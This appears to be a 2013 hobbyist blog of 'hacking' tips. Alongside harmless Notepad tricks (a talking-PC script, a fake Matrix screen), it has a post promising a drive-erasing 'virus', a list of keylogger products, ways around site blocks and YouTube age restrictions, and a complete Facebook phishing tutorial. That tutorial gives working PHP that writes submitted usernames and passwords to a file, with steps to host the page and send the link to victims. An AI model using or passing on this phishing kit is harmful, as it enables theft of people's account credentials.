Wednesday, 21 August 2013

Hay guys I made a video of how you can get a phising page for any social media for free under 2min its real easy so check it out!!!!     http://www.youtube.com/watch?v=wI7yYIUAzbk&list=HL1377118693&feature=player_detailpage

Friday, 2 August 2013

Make your computer say anything you want it to using Notepad! Talking PC  

1. Open Notepad and copy the code below.
           
            CreateObject("SAPI.SpVoice").Speak"say this"

2. IT should look like the pic below


3. Now save the file you can name it anything you want just make sure it has a ' .vbs ' for example : speak.vbs

4. You can replace the 'say this' with anything you want your computer to say   CreateObject("SAPI.SpVoice").Speak"say this"

5. Now if you open the file you computer is going to say what you typed, depending on the gender of your pc you will hear a male or female voice (yes computer has a gender!!!!!) 

Awesome looking Matrix hacking code effect using Notepad


1. Open Notepad and copy the code below.


@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t   
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A






2. It should look like the pic below. 


3. Now save it, you can give it any name you want just make sure it is ' .bat ' for example matrix.bat

4. Open the program and it should look like the pic below 


We are on Twitter follow us for tips, tricks and updates @ICDSSoftware


Types of Hackers



There are thee types of hackers white hat, grey hat, and black hat hackers. 

A White Hat (or, more properly, a "computer security specialist" or similar) will NEVER attempt to break into a system that they do not own or do not have explicit permission from the owner to do so. That means, they will usually be hired by a system or software owner to test the security of the said system or software package. They will always report their findings to the owner of the system, though there is somewhat of an ethical responsibility to report any significant (i.e. things that would impact the public) exploits to the community-at-large, if the original owner does not seem to be willing to address the issues - e.g. in case of a coverup of the problem, a White Hat is generally ethically bound to report the problem to the proper authorities, which may include public organizations such as CERT. More concisely, a White Hat is a professional, who abides by professional ethics and performs his or her duties out in the open. 

Grey Hat folks generally don't have obvious ill intent (to contradict the previous answer). That is, they're not looking to exploit any problems for personal gain. However, they generally follow an ethic which believes that it is OK to perform intrusion and exploit scans on systems which they DON'T own or have permission to do so. This makes it hard for a target to determine the difference between a Grey and Black Hat hacker, as the initial method of operation looks identical. That said, Grey Hat folks generally report their findings to the target - that is, they'll inform the target as to what security issues they have found. Most Grey Hats will give the target a small window to address the issues; however, a GH will always report the issue to the wider media and security groups, and will NOT consider any information that the target wants to keep private. That is, GH folks seem to see themselves as "defenders of the public good", and that by exposing weaknesses of systems, they will ultimately force folks to be more secure. This is a plausible, but not provably true, scenario. Grey Hat folks are hobbiests and enthusiasts, who generally don't get paid for their work, but pursue it for personal reasons. They generally keep their identities masked (or at least don't usually broadcast them), as much of their work is quasi-illegal. 

Black Hat folks, of course, are in it for the money (one way or the other). They're targets will never be informed of breaches, and in fact, most BH folks strive to keep their exploits secret from everyone, as it allows them to sneak in and steal information of value undetected. Black Hat folks are pure criminals.



Hackers can also be divided in to groups as follow
  • Type A (rookie hacker): This type of hacker is interested in new technology and hacks that others are preforming. What distinguishes these hackers from others is that they simply don't have the amount of computer expertise to preform many/any hacks. Every hacker starts out as a Type A.
  • Type B (beginner): Has the know-how to solve basic/intermediate computer problems and write basic programs. If you are a Type B hacker, you will make numerous mistakes, some minor, some fatal.
  • Type C (intermediate hacker): Comfortable fiddling with hardware and software alike. Likes to build computers, root cell phones and tablets, and test all electronic devices to their limits. Most Type C, D, and E hackers have their own websites and networks.
  • Type D (expert hacker): King of all other hackers. Can hack almost any piece of software or hardware in almost every way imaginable. Becoming a Type D hacker takes a lot of practice and dedication.
  • Type E (Business hacker): Turns computer knowledge into cash. Type E hackers can do things for money such as rooting devices, selling custom operating systems and programs, and fixing computer problems. These people are most often also Type C or D hackers.
  • Type F (illegal hacker): Called "crackers" by some, you do not want to be one of these.
Post blank statuses on Facebook 



1. Go to the 'what's on your mind ' Status block and type  @[0:0: ]   or  @[2:2: ]


2. Hit Enter and you should have a blank stat.
New Facebook smileys for chats












[[f9.laugh]]
[[f9.sad]]
[[f9.angry]]
 [[f9.sleepy]]
 [[f9.shock]]
[[f9.kiss]]
[[f9.inlove]]
[[f9.pizza]]
 [[f9.coffee]]
[[f9.rain]]
[[f9.bomb]]
[[f9.sun]]
[[f9.heart]]
 [[f9.heartbreak ]]
 [[f9.doctor]]
 [[f9.ghost]]
 [[f9.brb]]
 [[f9.wine]]
 [[f9.gift]]
[[f9.adore]]
 [[f9.angel]]
 [[f9.baloons]]
 [[f9.bowl]]
 [[f9.cake]]
 [[f9.callme]]
[[f9.clap]]
 [[f9.confused]]
[[f9.curllip]]
[[f9.devilface] ]


 [[f9.lying]] 

Thursday, 1 August 2013

Learn how to make a virus












What will this virus do? : IT will completely erase your C: drive.

1. Open Notepad and copy the code below into it. 




2. Now save the file virus.bat, you can name it anything you want just make sure it is ' .bat '

3. Done! you created your very own virus.

.Running this file will delete all content of Drive C. I recommend not trying this on yourself.

I will not be responsible for any damage on your computer, this is for educational purposes only. 
Keyloggers




A keylogger is a type of surveillance software(considered to be either software or spyware) that has the capability to record every keystroke you make to a log file, ussually encrypted. A keylogger recorder can record instant messages, e-mails, and any information you type at any time using your keyboard. The log file created by the keylogger can then be sent to a specified receiver. Some keylogger programs will also record any e-mail addresses you use and Website URLs you visit.
Be on the lookout for a tutorial on how to set up your own keylogger.

Here is a list of the 5 best keylogger software you can take a look at so long.

1. REFOG Free Keylogger


2. Revealer Keylogger Free Edition


3. Quick FREE Keylogger 


4. Actual Keylogger



5007 Keylogger



Accessing a blocked website through the IP address 


 










In this tutorial I will teach you how to access a blocked website. 

1. First we need to get the IP address of the  page you want to access. Go to Start > Type CMD and press Enter.

2. Open the program and type ‘PING’ followed by the website URL you want the IP address of.


3. Hit Enter and within a second it will come up with the results here below.


4. Enter the IP address in your browser and you should be able to access the blocked site.



Watch 18+ Videos On YouTube Without Signing In


















Tired of seeing 'Sorry, this content is age restricted'? Here is the simple and easy solution!!


1. First get the Url of video you want to watch. As shown below.









2. Then copy the Id of the video this one is V5ZRmba8dTg.


3. Now paste the video Id in the link shown below.( Replace the VideoId with the one you copied in step 2)








4. Now the url will become like the one shown below            





5. Done.
How to hack Facebook with phishing page

Phishing is a illegal activity so don't try this on anyone.This tutorial is for educational purpose only.
Not only Facebook you can make a phishing page of any website by following these steps.
You can hack Gmail,Yahoo,Orkut,Twitter and loads more!
Have fun ;)


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

FACEBOOK PHISHING....


facebook hack
                                                                         


steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.




                                          
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.


facebook phishing script
                                                  

                                           
4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .


hacking script
index

                                                   

8.Open a new notepad and save the given data with the name post.php.

<?php

header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.


10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.


11.I prefer u to use 000webhost because it will be easy to use.

                           
hosting website
                                              

12.You have to make a account in that ,after that it looks like a picture given below.




facebook script hosting website
                                                                          
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.



                                           
                                        

15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .




                                        
16.Now the last step click on view of index.htm it will look same as facebook page.



this is your Facebook phishing page
                                         

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.


18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.

                                


                                        

19.Click on view now u will have your friend's password and email id.